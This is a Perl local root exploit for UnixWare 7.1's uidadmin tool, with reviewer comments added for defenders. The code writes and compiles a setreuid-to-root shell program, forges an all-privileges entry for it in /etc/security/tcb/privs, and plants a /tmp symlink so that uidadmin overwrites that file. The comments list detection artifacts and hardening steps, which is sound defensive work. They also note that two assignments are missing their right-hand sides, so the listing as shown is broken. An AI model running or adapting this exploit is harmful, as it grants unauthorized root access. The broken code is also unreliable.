#!/usr/bin/perl
###########################################################
# /usr/bin/uidadmin exploit for UnixWare 7.1
# Uses a symlink exploit to add our program to a list of elevated privileges
# programs in /etc/security/tcb/privs. After reboot, /tmp/ui will be added
# to the list of privileged programs.
#
# Format of the privs file is as follows (ctime and size are just as
# st_ctime and st_size as described by stat(2)):
# size:checksum:time:perms:/full/path/to/prog
#
# -Brock Tellier btellier@usa.net
#
###########################################################
#
# NOTE(review): reading notes for defenders and auditors.
#  * Vulnerability class: a symlink planted in a world-writable directory
#    (/tmp) that a privileged tool is then pointed at. What uidadmin does
#    with its -S argument is not visible in this file; presumably it writes
#    a temporary file under that directory and follows the link -- confirm
#    against vendor documentation.
#  * Artifacts this script leaves, usable as detection points: a symlink at
#    /tmp/uidata.tmp whose target is /etc/security/tcb/privs, a one-line
#    file /tmp/uidata in privs format, a uidadmin invocation whose -S
#    argument contains "..", and a privs entry carrying "%fixed,allprivs"
#    for a binary under a user's home directory.
#  * Hardening: integrity-monitor the privs file, and make sure privileged
#    tools create temporary files exclusively and never follow symlinks in
#    directories other users can write to.
#  * The header above names /tmp/ui, but $ui_dest below is /home/xnec/ui.
#  * Two assignments further down have lost their right-hand side in this
#    copy, so the listing does not parse as shown.

# Paths and constants used throughout the script.
$ui_source = "/home/xnec/ui.c";     # C source file written by this script
$ui_dest = "/home/xnec/ui";         # compiled binary the privs entry will name
# One-line C program: sets real and effective uid to 0, then runs /bin/ksh.
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";   # system privilege list (target of the symlink)
$uidatafile="/tmp/uidata";              # file that receives the crafted privs line
$sumpath = "/usr/bin/sum";              # checksum utility run against $ui_dest
$uidata_sym = "/tmp/uidata.tmp";        # name of the symlink created below
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";        # the privileged tool being invoked

###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
# The ".." components step out of /etc/uidata/ so the path resolves to /tmp.
$uidadminarg = "../../tmp";

print("\n* uidadmin exploit for UnixWare 7.1 \n\n");

###
# Output $ui_code to $ui_source and compile into $ui_dest
###
# The open() result is not checked; a failure here only shows up later as
# the "error compiling" die.
open(UIS, ">$ui_source");
printf(UIS "$ui_code\n");
close(UIS);
system ("$compiler -o $ui_dest $ui_source");

# Compilation is judged by the existence of the output file, not by the
# compiler's exit status.
if ( -e $ui_dest ) {
    print("\n$ui_dest successfully compiled\n");
} else { die "error compiling $ui_dest"; }

###
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###
# Element 7 of stat() is the size and element 10 the ctime. The || binds to
# the size value, so the die also fires for a zero-length file.
$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");

###
# get the checksum value for $ui_dest
###
# Opens a pipe from "sum -r" on the binary; the result is not checked.
open(SUM, "$sumpath -r $ui_dest|");
# NOTE(review): the right-hand side of this assignment is missing in this
# copy (presumably lost when the page was extracted); it does not parse.
$checksum=;
chomp($checksum);
# Keep only the first whitespace-separated field of the sum output.
@sumfields=split(' ', $checksum);
$chksum = @sumfields[0];
# Drop a single leading zero so the value matches the form used in privs
# (assumption: privs stores the checksum without zero padding -- confirm).
$chksum =~ s/^0//;
print("$ui_dest checksum is $chksum\n");

###
# Put our entry into $uidatafile, use trailing newline
###
# Builds one record in the size:checksum:time:perms:path layout described
# in the header; "\%" yields a literal percent sign.
$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing '$uidata' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
close(TMP);

###
# Create symlink from $uidata_sym to $privloc
###
# After this call /tmp/uidata.tmp is a link to the privs file; the return
# value is not checked.
symlink($privloc, $uidata_sym);

###
# All the preparation is done, launch the exploit
###
# Runs uidadmin with -S pointing at /tmp via the relative path above. The
# meaning of -a and -r is not shown in this file.
system("$uidadmin -S $uidadminarg -a -r bah");

###
# Find out if the exploit worked, assume it did if $ui_dest is in $privloc
###
open (PRIV, "$privloc");
# NOTE(review): the right-hand side of this assignment is also missing in
# this copy; as written, the statement does not parse.
@privs = ;
# Success is inferred from any line of the privs file matching $ui_dest,
# which is interpolated as a regular expression rather than compared exactly.
foreach $priv (@privs) {
    if ($priv =~ /$ui_dest/) {
        print("Exploit successful. Run $ui_dest after reboot for rootshell\n");
        exit(0);
    }
}
print("Exploit not successful, sorry!\n");
# www.hack.co.za [2000]#